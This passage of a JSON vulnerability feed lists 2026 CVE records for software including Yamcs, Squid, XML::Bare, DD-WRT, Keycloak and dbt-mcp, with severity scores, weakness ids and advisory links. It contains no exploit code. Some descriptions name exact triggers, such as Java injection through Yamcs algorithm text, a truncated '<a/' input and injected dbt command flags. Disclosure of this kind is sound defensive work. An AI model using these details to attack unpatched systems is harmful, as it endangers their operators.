Project."}],"affected":[{"source":"9b29abf9-4ab0-4765-b253-1875cd9b441e","affectedData":[{"vendor":"TOKUHIROM","product":"Image::EPEG","defaultStatus":"unaffected","collectionURL":"https://cpan.org/modules","packageName":"Image-EPEG","programFiles":["epeg/src/lib/epeg_main.c"],"versions":[{"version":"0","lessThanOrEqual":"0.15","versionType":"custom","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","baseScore":9.8,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":5.9}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T17:34:45.451295Z","id":"CVE-2026-3031","options":[{"exploitation":"none"},{"automatable":"yes"},{"technicalImpact":"total"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"9b29abf9-4ab0-4765-b253-1875cd9b441e","type":"Secondary","description":[{"lang":"en","value":"CWE-1104"}]}],"references":[{"url":"https://backpan.metacpan.org/authors/id/T/TO/TOKUHIROM/Image-Epeg-0.15.readme","source":"9b29abf9-4ab0-4765-b253-1875cd9b441e"},{"url":"https://backpan.metacpan.org/authors/id/T/TO/TOKUHIROM/Image-Epeg-0.15.tar.gz","source":"9b29abf9-4ab0-4765-b253-1875cd9b441e"},{"url":"https://sourceforge.net/projects/enlightenment/files/OldFiles/epeg-0.9.0.tar.gz/download","source":"9b29abf9-4ab0-4765-b253-1875cd9b441e"}]}},{"cve":{"id":"CVE-2026-44596","sourceIdentifier":"security-advisories@github.com","published":"2026-07-16T17:16:55.880","lastModified":"2026-07-17T18:44:26.383","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"Yamcs is a mission control framework. Prior to 5.12.7, the authentication endpoint POST /auth/token in yamcs-core, handled by yamcs-core/src/main/java/org/yamcs/http/auth/AuthHandler.java, lacked any rate limiting, account lockout, or failed-attempt throttling, so an unauthenticated remote attacker could perform unlimited password-guessing attempts against any user account, significantly increasing the risk of successful brute-force attacks. This issue is fixed in versions 5.12.7 and 5.13.0."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"yamcs","product":"yamcs","versions":[{"version":"< 5.12.7","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N","baseScore":6.5,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":3.9,"impactScore":2.5},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","baseScore":9.8,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":5.9}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T14:05:04.998522Z","id":"CVE-2026-44596","options":[{"exploitation":"poc"},{"automatable":"yes"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Secondary","description":[{"lang":"en","value":"CWE-307"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:spaceapplications:yamcs:*:*:*:*:*:*:*:*","versionEndExcluding":"5.12.7","matchCriteriaId":"1F836127-88FB-4BD4-AD07-FE5B324349CD"}]}]}],"references":[{"url":"https://github.com/yamcs/yamcs/commit/309218c651680f79df11a8d0f8628f7033f98a83","source":"security-advisories@github.com","tags":["Patch"]},{"url":"https://github.com/yamcs/yamcs/commit/64392df531fbcbc65f19ee5724c4c23d289f49fc","source":"security-advisories@github.com","tags":["Patch"]},{"url":"https://github.com/yamcs/yamcs/releases/tag/yamcs-5.12.7","source":"security-advisories@github.com","tags":["Release Notes"]},{"url":"https://github.com/yamcs/yamcs/releases/tag/yamcs-5.13.0","source":"security-advisories@github.com","tags":["Release Notes"]},{"url":"https://github.com/yamcs/yamcs/security/advisories/GHSA-w5r6-mcgq-7pq4","source":"security-advisories@github.com","tags":["Exploit","Vendor Advisory"]},{"url":"https://github.com/yamcs/yamcs/security/advisories/GHSA-w5r6-mcgq-7pq4","source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","tags":["Exploit","Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-44632","sourceIdentifier":"security-advisories@github.com","published":"2026-07-16T17:16:56.023","lastModified":"2026-07-17T18:38:47.353","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"Yamcs is a mission control framework. Prior to 5.12.7, a server-side code injection vulnerability existed in the Yamcs algorithm evaluation engine org.yamcs.algorithms.JavaExprAlgorithmExecutionFactory, which dynamically compiled and evaluated user-controlled algorithm text through the Janino compiler without enforcing a secure sandbox, so an authenticated user with the ChangeMissionDatabase privilege could override an existing algorithm's text via the mission database REST API and inject Java code (for example using java.lang.Runtime) to achieve remote code execution on the underlying host operating system. This issue is fixed in versions 5.12.7 and 5.13.0, which disable algorithm editing by default."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"yamcs","product":"yamcs","versions":[{"version":"< 5.12.7","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H","baseScore":9.1,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"HIGH","userInteraction":"NONE","scope":"CHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":2.3,"impactScore":6.0}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-16T16:45:59.615647Z","id":"CVE-2026-44632","options":[{"exploitation":"poc"},{"automatable":"no"},{"technicalImpact":"total"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Primary","description":[{"lang":"en","value":"CWE-94"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:spaceapplications:yamcs:*:*:*:*:*:*:*:*","versionEndExcluding":"5.12.7","matchCriteriaId":"1F836127-88FB-4BD4-AD07-FE5B324349CD"}]}]}],"references":[{"url":"https://github.com/yamcs/yamcs/commit/3c550348f866af4675d2ba4a51d8d12b7c7c6011","source":"security-advisories@github.com","tags":["Patch"]},{"url":"https://github.com/yamcs/yamcs/commit/4ff8fda642ea8c3309a4d3f379aa77b763148992","source":"security-advisories@github.com","tags":["Patch"]},{"url":"https://github.com/yamcs/yamcs/releases/tag/yamcs-5.12.7","source":"security-advisories@github.com","tags":["Release Notes"]},{"url":"https://github.com/yamcs/yamcs/releases/tag/yamcs-5.13.0","source":"security-advisories@github.com","tags":["Release Notes"]},{"url":"https://github.com/yamcs/yamcs/security/advisories/GHSA-524g-x36v-9wm6","source":"security-advisories@github.com","tags":["Exploit","Vendor Advisory"]},{"url":"https://github.com/yamcs/yamcs/security/advisories/GHSA-524g-x36v-9wm6","source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","tags":["Exploit","Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-45325","sourceIdentifier":"security-advisories@github.com","published":"2026-07-16T17:16:56.160","lastModified":"2026-07-17T19:17:14.473","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"Gestor de Oferta is a web application for managing mobility service offerings. Prior to 20260509.0340.15, @tmlmobilidade/utils has a prototype pollution vulnerability in setValueAtPath() in packages/utils/src/generic/value-at-path.ts because unsafe path segments are not blocked. This issue is fixed in version 20260509.0340.15."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"tmlmobilidade","product":"go","versions":[{"version":"< 20260509.0340.15","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L","baseScore":8.2,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"HIGH","availabilityImpact":"LOW"},"exploitabilityScore":3.9,"impactScore":4.2}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-16T17:26:53.567311Z","id":"CVE-2026-45325","options":[{"exploitation":"none"},{"automatable":"yes"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Secondary","description":[{"lang":"en","value":"CWE-1321"}]}],"references":[{"url":"https://github.com/tmlmobilidade/go/commit/b10505baa7ba0701f830a05f3007c0a6bdd00eb7","source":"security-advisories@github.com"},{"url":"https://github.com/tmlmobilidade/go/security/advisories/GHSA-cmxg-94mg-jq94","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-47729","sourceIdentifier":"security-advisories@github.com","published":"2026-07-16T17:16:57.217","lastModified":"2026-07-17T19:17:15.573","vulnStatus":"Undergoing Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"Squid is a caching proxy for the Web. Prior to 7.6, due to an improper validation of syntactic correctness of input in the FTP gateway (src/clients/FtpGateway.cc), Squid is vulnerable to an out-of-bounds read: when a listing entry date in the TypeA or TypeB directory-listing formats is not followed by a filename, parsing was not restricted to the input buffer, so a trusted client accessing a misbehaving FTP server through Squid's gateway feature could read memory from random unrelated transactions. This issue is fixed in version 7.6."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"squid-cache","product":"squid","versions":[{"version":"< 7.6","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N","baseScore":6.5,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":3.6}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-16T17:52:23.166119Z","id":"CVE-2026-47729","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Secondary","description":[{"lang":"en","value":"CWE-125"},{"lang":"en","value":"CWE-1289"}]}],"references":[{"url":"https://github.com/squid-cache/squid/commit/865a131c7d557e68c965043d98c2eccae26deef8","source":"security-advisories@github.com"},{"url":"https://github.com/squid-cache/squid/pull/2408","source":"security-advisories@github.com"},{"url":"https://github.com/squid-cache/squid/pull/2409","source":"security-advisories@github.com"},{"url":"https://github.com/squid-cache/squid/releases/tag/SQUID_7_6","source":"security-advisories@github.com"},{"url":"https://github.com/squid-cache/squid/security/advisories/GHSA-8c37-pxjq-qwrg","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-57074","sourceIdentifier":"9b29abf9-4ab0-4765-b253-1875cd9b441e","published":"2026-07-16T17:16:58.213","lastModified":"2026-07-17T19:17:17.263","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"XML::Bare versions through 0.53 for Perl have an unbounded character lookahead.\n\nThe parserc_parse function attempts to check for multicharacter strings such as \"<![CDATA\" or element terminators such as \">\" without checking that the offsets are within the buffer.\n\nTruncated strings such as \"<a/\" can trigger an out-of-bounds read."}],"affected":[{"source":"9b29abf9-4ab0-4765-b253-1875cd9b441e","affectedData":[{"vendor":"CODECHILD","product":"XML::Bare","defaultStatus":"unaffected","collectionURL":"https://cpan.org/modules","packageName":"XML-Bare","programFiles":["parser.c"],"programRoutines":[{"name":"parserc_parse"}],"repo":"https://github.com/nanoscopic/perl-XML-Bare","versions":[{"version":"0","lessThanOrEqual":"0.53","versionType":"custom","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H","baseScore":9.1,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":5.2}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T17:19:28.282762Z","id":"CVE-2026-57074","options":[{"exploitation":"none"},{"automatable":"yes"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"9b29abf9-4ab0-4765-b253-1875cd9b441e","type":"Secondary","description":[{"lang":"en","value":"CWE-125"}]}],"references":[{"url":"https://github.com/nanoscopic/perl-XML-Bare/pull/1","source":"9b29abf9-4ab0-4765-b253-1875cd9b441e"},{"url":"https://security.metacpan.org/patches/X/XML-Bare/0.53/CVE-2026-57074-r1.patch","source":"9b29abf9-4ab0-4765-b253-1875cd9b441e"},{"url":"http://www.openwall.com/lists/oss-security/2026/07/16/1","source":"af854a3a-2127-422b-91ae-364da2661108"}]}},{"cve":{"id":"CVE-2026-63085","sourceIdentifier":"disclosure@vulncheck.com","published":"2026-07-16T17:16:58.420","lastModified":"2026-07-17T19:17:18.893","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"Axelor Open Platform versions 8.x prior to 8.2.2 contains an authorization bypass vulnerability that allows authenticated non-admin users to escalate privileges by exploiting unenforced field restrictions on nested relational save operations. Attackers can modify sensitive User record fields such as roles and group by submitting changes through a related entity's save path, bypassing the USER_RESTRICTED_FIELDS control and causing the JPA persistence layer to flush attacker-supplied admin role and group assignments on commit."}],"affected":[{"source":"disclosure@vulncheck.com","affectedData":[{"vendor":"axelor","product":"axelor-open-platform","defaultStatus":"affected","repo":"https://github.com/axelor/axelor-open-platform","versions":[{"version":"8.0.0","lessThan":"8.2.2","versionType":"semver","status":"affected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"disclosure@vulncheck.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":8.7,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"LOW","userInteraction":"NONE","vulnConfidentialityImpact":"HIGH","vulnIntegrityImpact":"HIGH","vulnAvailabilityImpact":"HIGH","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"cvssMetricV31":[{"source":"disclosure@vulncheck.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H","baseScore":8.8,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":2.8,"impactScore":5.9}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-16T17:52:48.440041Z","id":"CVE-2026-63085","options":[{"exploitation":"poc"},{"automatable":"no"},{"technicalImpact":"total"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"disclosure@vulncheck.com","type":"Secondary","description":[{"lang":"en","value":"CWE-863"}]}],"references":[{"url":"https://github.com/axelor/axelor-open-platform/releases/tag/v8.2.2","source":"disclosure@vulncheck.com"},{"url":"https://github.com/geo-chen/oss/blob/main/axelor-open-platform.md","source":"disclosure@vulncheck.com"},{"url":"https://www.vulncheck.com/advisories/axelor-open-platform-8-x-authorization-bypass-via-nested-relational-record-persistence","source":"disclosure@vulncheck.com"}]}},{"cve":{"id":"CVE-2021-27137","sourceIdentifier":"cve@mitre.org","published":"2026-07-16T18:16:39.113","lastModified":"2026-07-17T18:47:13.683","vulnStatus":"Awaiting Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"An issue was discovered in router/upnp/src/ssdp.c in DD-WRT before 45724. An unsafe strcpy in the UPnP handling functionality allows an unauthenticated remote attacker to send a request that would overflow an internal fixed buffer. Exploitation requires the DD-WRT user to enable UPnP (which is off by default, and only listens on internal interfaces by default). This occurs in ssdp_msearch (reachable by an M-SEARCH request)."}],"affected":[{"source":"cve@mitre.org","affectedData":[{"vendor":"DD-WRT","product":"DD-WRT","defaultStatus":"unaffected","versions":[{"version":"0","lessThan":"45724","versionType":"custom","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"cve@mitre.org","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","baseScore":8.1,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"HIGH","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":2.2,"impactScore":5.9}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-16T18:24:17.054985Z","id":"CVE-2021-27137","options":[{"exploitation":"poc"},{"automatable":"no"},{"technicalImpact":"total"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"cve@mitre.org","type":"Secondary","description":[{"lang":"en","value":"CWE-121"}]}],"references":[{"url":"https://securityaffairs.com/193290/uncategorized/iot-botnet-c0xmo-adds-competitor-killing-capability.html","source":"cve@mitre.org"},{"url":"https://ssd-disclosure.com/ssd-advisory-dd-wrt-upnp-buffer-overflow/","source":"cve@mitre.org"},{"url":"https://svn.dd-wrt.com/changeset/45724","source":"cve@mitre.org"},{"url":"https://www.bleepingcomputer.com/news/security/c0xmo-botnet-spreads-via-dd-wrt-router-flaw-kills-rival-malware/","source":"cve@mitre.org"},{"url":"https://www.fortinet.com/blog/threat-research/inside-cross-platform-propagation-of-new-gafgyt-variant-c0xmo","source":"cve@mitre.org"},{"url":"https://ssd-disclosure.com/ssd-advisory-dd-wrt-upnp-buffer-overflow/","source":"134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}},{"cve":{"id":"CVE-2026-15737","sourceIdentifier":"ff89ba41-3aa1-4d27-914a-91399e9639e5","published":"2026-07-16T18:16:42.537","lastModified":"2026-07-17T18:08:44.860","vulnStatus":"Awaiting Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"AWS Bedrock AgentCore Python SDK is an open-source Python library that provides client tools for building AI agents on the Amazon Bedrock AgentCore platform.\n\n\n\nUnintended logging of sensitive user content in the OpenTelemetry instrumentation in AWS Bedrock AgentCore Python SDK versions 1.4.8 and 1.5.0 might allow a local authenticated user with access to CloudWatch Logs to access raw user prompts and agent responses containing sensitive data via span attributes. The SDK wrote raw user prompts and complete agent responses into OpenTelemetry span attributes on every invocation without filtering or masking. These spans flow into the customer's aws/spans CloudWatch log group, exposing sensitive content to any principal with log read access.\n\n\n\nWe recommend you upgrade to version 1.5.1 or later. Users who ran affected versions should also review and purge sensitive content from their aws/spans CloudWatch log groups."}],"affected":[{"source":"ff89ba41-3aa1-4d27-914a-91399e9639e5","affectedData":[{"vendor":"AWS","product":"bedrock-agentcore","defaultStatus":"unaffected","versions":[{"version":"1.4.8","status":"affected"},{"version":"1.5.0","status":"affected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"ff89ba41-3aa1-4d27-914a-91399e9639e5","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:A/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":5.7,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"PRESENT","privilegesRequired":"LOW","userInteraction":"ACTIVE","vulnConfidentialityImpact":"HIGH","vulnIntegrityImpact":"NONE","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"cvssMetricV31":[{"source":"ff89ba41-3aa1-4d27-914a-91399e9639e5","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N","baseScore":5.7,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"REQUIRED","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":2.1,"impactScore":3.6}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-16T17:58:18.876693Z","id":"CVE-2026-15737","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"ff89ba41-3aa1-4d27-914a-91399e9639e5","type":"Secondary","description":[{"lang":"en","value":"CWE-532"}]}],"references":[{"url":"https://aws.amazon.com/security/security-bulletins/2026-058-aws/","source":"ff89ba41-3aa1-4d27-914a-91399e9639e5"},{"url":"https://github.com/aws/bedrock-agentcore-sdk-python/security/advisories/GHSA-hqf8-7w95-9r33","source":"ff89ba41-3aa1-4d27-914a-91399e9639e5"},{"url":"https://pypi.org/project/bedrock-agentcore/1.5.1/","source":"ff89ba41-3aa1-4d27-914a-91399e9639e5"}]}},{"cve":{"id":"CVE-2026-15945","sourceIdentifier":"secalert@redhat.com","published":"2026-07-16T18:16:42.693","lastModified":"2026-07-17T18:08:08.140","vulnStatus":"Awaiting Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"A flaw was found in the group search functionality of the Keycloak server's administrative API. When Fine-Grained Admin Permissions (FGAP) v2 is enabled, a delegated administrator can bypass access restrictions to view parent groups they are not authorized to see. By searching for a child group they have permission to view, the system incorrectly returns the full details of the parent group in the response, leading to the disclosure of sensitive group attributes and configuration."}],"affected":[{"source":"secalert@redhat.com","affectedData":[{"vendor":"Red Hat","product":"Red Hat Build of Keycloak","defaultStatus":"affected","collectionURL":"https://access.redhat.com/downloads/content/package-browser/","packageName":"keycloak-services","cpes":["cpe:/a:redhat:build_keycloak:"]},{"vendor":"Red Hat","product":"Red Hat Build of Keycloak","defaultStatus":"affected","collectionURL":"https://access.redhat.com/downloads/content/package-browser/","packageName":"rhbk-keycloak-rhel9/rhbk-keycloak-rhel9","cpes":["cpe:/a:redhat:build_keycloak:"]},{"vendor":"Red Hat","product":"Red Hat Build of Keycloak","defaultStatus":"affected","collectionURL":"https://access.redhat.com/downloads/content/package-browser/","packageName":"rhbk-openshift-rhel9/rhbk-openshift-rhel9","cpes":["cpe:/a:redhat:build_keycloak:"]},{"vendor":"Red Hat","product":"Red Hat Data Grid 8","defaultStatus":"affected","collectionURL":"https://access.redhat.com/downloads/content/package-browser/","packageName":"keycloak-services","cpes":["cpe:/a:redhat:jboss_data_grid:8"]},{"vendor":"Red Hat","product":"Red Hat JBoss Enterprise Application Platform Expansion Pack","defaultStatus":"affected","collectionURL":"https://access.redhat.com/jbossnetwork/restricted/listSoftware.html","packageName":"keycloak-services","cpes":["cpe:/a:redhat:jbosseapxp"]},{"vendor":"Red Hat","product":"Red Hat Single Sign-On 7","defaultStatus":"affected","collectionURL":"https://access.redhat.com/downloads/content/package-browser/","packageName":"keycloak-services","cpes":["cpe:/a:redhat:red_hat_single_sign_on:7"]}]}],"metrics":{"cvssMetricV31":[{"source":"secalert@redhat.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N","baseScore":4.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":1.4}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T13:59:59.366659Z","id":"CVE-2026-15945","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"secalert@redhat.com","type":"Secondary","description":[{"lang":"en","value":"CWE-639"}]}],"references":[{"url":"https://access.redhat.com/security/cve/CVE-2026-15945","source":"secalert@redhat.com"},{"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2501302","source":"secalert@redhat.com"}]}},{"cve":{"id":"CVE-2026-44968","sourceIdentifier":"security-advisories@github.com","published":"2026-07-16T18:16:43.100","lastModified":"2026-07-17T19:17:13.923","vulnStatus":"Undergoing Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"dbt-mcp is a Model Context Protocol server for interacting with dbt. Prior to 1.17.1, _run_dbt_command() in src/dbt_mcp/dbt_cli/tools.py appended unsanitized node_selection and resource_type values to the dbt subprocess argument list, allowing an MCP client to inject dbt global flags such as --profiles-dir, --project-dir, and --target into subprocess.Popen even though shell=False prevents shell metacharacter injection. This issue is fixed in version 1.17.1."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"dbt-labs","product":"dbt-mcp","versions":[{"version":"< 